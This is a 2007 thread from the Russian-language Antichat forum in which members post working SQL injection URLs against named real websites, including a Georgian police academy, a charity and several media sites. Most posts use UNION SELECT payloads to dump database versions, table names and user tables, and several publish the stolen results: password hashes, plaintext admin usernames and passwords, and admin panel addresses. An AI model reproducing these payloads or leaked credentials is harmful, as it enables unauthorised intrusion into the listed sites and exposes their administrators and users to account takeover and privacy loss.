HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #4211  
Старый 27.12.2007, 23:27
.Begemot.
Участник форума
Регистрация: 27.03.2007
Сообщений: 161
Провел на форуме:
1273248

Репутация: 785
Отправить сообщение для .Begemot. с помощью ICQ
По умолчанию

renegadecommentaries.co.uk

Код HTML:
http://www.renegadecommentaries.co.uk/commentary.php?movie=1+union+select+0,VERSION(),DATABASE(),USER(),4,5/*
USER:renegade_khayman@localhost
VERSION:4.1.22-standard-log
DATABASE:renegade_maintest

Есть таблица users, поля id и password.
Код HTML:
http://www.renegadecommentaries.co.uk/commentary.php?movie=1+union+select+0,1,2,concat(id,0x3a,password),4,5+from+users/*
 
Ответить с цитированием

  #4212  
Старый 28.12.2007, 00:25
~EviL~
Участник форума
Регистрация: 14.08.2007
Сообщений: 150
Провел на форуме:
686641

Репутация: 205
По умолчанию

http://www.akulovagora.ru/

Код HTML:
http://www.akulovagora.ru/page.php?pid=12'+and(1=2)+UNION+SELECT+1,2,concat(version(),0x3a,user(),0x3a,database()),4,5,6/*
4.1.21-log:sabra-alen@82.179.244.69:alukova
 
Ответить с цитированием

  #4213  
Старый 28.12.2007, 02:12
Ded MustD!e
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684

Репутация: 3908
По умолчанию

http://moscowtoday.info/

Код:
http://moscowtoday.info/news.php?ID=-1'+union+select+concat_ws(0x3a,user(),database(),version())/*
вывод данных в тайтле...
 
Ответить с цитированием

  #4214  
Старый 28.12.2007, 07:10
K1nD[e]R
Участник форума
Регистрация: 16.06.2007
Сообщений: 133
Провел на форуме:
1877761

Репутация: 237
Отправить сообщение для K1nD[e]R с помощью ICQ
По умолчанию

Код:
http://www.myvideo.ge/cams/goLive.php?act=View&st_u_id=-24969+union+select+1,2,3,concat_ws(0x2F,user_id,user_name,user_password),version(),6,7,8+from+video_users/*
Version 5.0.22-log

user_name Password

Guro f5d1278e8109edd94e1e4197e04873b9
achiko 202cb962ac59075b964b07152d234b70
 
Ответить с цитированием

  #4215  
Старый 28.12.2007, 13:22
fRg
Участник форума
Регистрация: 28.12.2006
Сообщений: 111
Провел на форуме:
500695

Репутация: 524
Отправить сообщение для fRg с помощью ICQ
По умолчанию

Год моей регистрации!

hcch.net
Код:
http://www.hcch.net/index_en.php?act=conventions.text&cid=-1+union+select+aes_decrypt(aes_encrypt(concat_ws(0x3a,version(),database(),user()),0x71),0x71),2,3,4/*
4.1.11-Debian_4sarge7-log:hcch:hcch@localhost

[ Логин : MySQL(pass) ] :
Код:
root : 066bc62049564980
group.ge
Код:
http://www.group.ge/series.php?id_pro=-1+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,version(),database(),user()),11,12,13/*
5.0.22:grp:grp@localhost

PoliceAcademy.ge - Академия МВД Грузии
Код:
http://www.policeacademy.ge/news.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10,11,12,13,14,15,16/*
5.0.22:academy:cube@localhost

Таблица authentification:
Код:
id,username,password,survey_user,survey_pass,live_user,live_pass,level
admin:studio0386

Таблица _forum_members :
Код:
id,name,mgroup,legacy_password,email,joined,ip_address,posts,title,allow_admin_mails,
time_offset,hide_email,email_pm,email_full,skin,warn_level,warn_lastwarn,language,
last_post,restrict_post,view_sigs,view_img,view_avs,view_pop,bday_day,bday_month,
bday_year,new_msg,msg_total,show_popup,misc,last_visit,last_activity,dst_in_use,
view_prefs,coppa_user,mod_posts,auto_track,temp_ban,sub_end,login_anonymous,
ignored_users,mgroup_others,org_perm_id,member_login_key,subs_pkg_chosen,has_blog,
members_markers,members_editor_choice,members_auto_dst,members_display_name,
members_created_remote,members_cache,members_disable_pm
Есть таблица _forum_moderators

Последний раз редактировалось fRg; 28.12.2007 в 15:10..
 
Ответить с цитированием

  #4216  
Старый 28.12.2007, 15:25
Ded MustD!e
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684

Репутация: 3908
По умолчанию

http://www.blagotvori.com

Код:
http://www.blagotvori.com/programs.php?pid=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,login,passwd),8,9,10,11,12+from+admin/*
Админка:
http://www.blagotvori.com/admin/

login: nat_nadegdina
pass: nAtt756V12r

Последний раз редактировалось Ded MustD!e; 28.12.2007 в 15:40..
 
Ответить с цитированием

  #4217  
Старый 28.12.2007, 15:39
it's my
Banned
Регистрация: 29.09.2007
Сообщений: 512
Провел на форуме:
4038468

Репутация: 1224


Отправить сообщение для it's my с помощью ICQ
По умолчанию

www.uprava.org - Сайт журнала посвященного вопросам местного самоуправления в России.
Код:
http://www.uprava.org/section.php?id=34+union+select+0,1,2,3,4,5,concat_ws(0x2F,user())--
www.gaycentral.ru - Сайт Гей-Клуба "Три Обезьяны"
Код:
http://www.gaycentral.ru/news/?id=99999999+union+select+0,null,concat_ws(0x2F,user(),version()),2,3,null,null,null,4,null,5--

Последний раз редактировалось it's my; 28.12.2007 в 16:17..
 
Ответить с цитированием

  #4218  
Старый 28.12.2007, 17:26
AkyHa_MaTaTa
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874

Репутация: 1020


Отправить сообщение для AkyHa_MaTaTa с помощью ICQ
По умолчанию

Первый эду который гугл выдает на "You have an error in your SQL syntax"(вывод в титле):
http://ipr1.hsc.usc.edu/php/wwwthreads5.4/showflat.php?Cat=-1'%20union%20select%20+concat(U_Name,char(59),U_Pa ssword)+FROM+w3t_Users+LIMIT%202,1/*
 
Ответить с цитированием

  #4219  
Старый 28.12.2007, 17:41
.Begemot.
Участник форума
Регистрация: 27.03.2007
Сообщений: 161
Провел на форуме:
1273248

Репутация: 785
Отправить сообщение для .Begemot. с помощью ICQ
По умолчанию

kinopano.ru

Код HTML:
http://www.kinopano.ru/index.php?action=movie&sub=trailer&id=540+union+select+0,1,2,3,4,5,6,7,8,9,10/*
Код HTML:
http://www.kinopano.ru/index.php?action=movie&sub=trailer&id=540+union+select+0,1,2,3,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),5,6,7,8,9,10/*
USER:u24822@10.10.10.226
VERSION:5.0.45-log
DATABASE:u24822

Вывод названий всех таблиц -
Код HTML:
http://www.kinopano.ru/index.php?action=movie&sub=trailer&id=540+union+select+0,1,2,3,table_name,5,6,7,8,9,10+from+information_schema.tables/*
Вывод названий всех колонн -
Код HTML:
http://www.kinopano.ru/index.php?action=movie&sub=trailer&id=540+union+select+0,1,2,3,column_name,5,6,7,8,9,10+from+information_schema.columns/*
Вывод id,name,passwd из таблици kino_users -
Код HTML:
http://www.kinopano.ru/index.php?action=movie&sub=trailer&id=540+union+select+0,1,2,3,concat(id,0x3a,name,0x3a,passwd),5,6,7,8,9,10+from+kino_users/*
Админка -
Код HTML:
http://www.kinopano.ru/admin/

Последний раз редактировалось trumps; 28.12.2007 в 17:45..
 
Ответить с цитированием

  #4220  
Старый 28.12.2007, 17:51
v1ru$
Постоянный
Регистрация: 17.03.2007
Сообщений: 336
Провел на форуме:
3766085

Репутация: 576
Отправить сообщение для v1ru$ с помощью ICQ
По умолчанию

Код:
http://www.green-bay.tv/e_commitem.php?id=-31+union+select+1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12,13+from+users/*
gbadmin:Rhondda
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ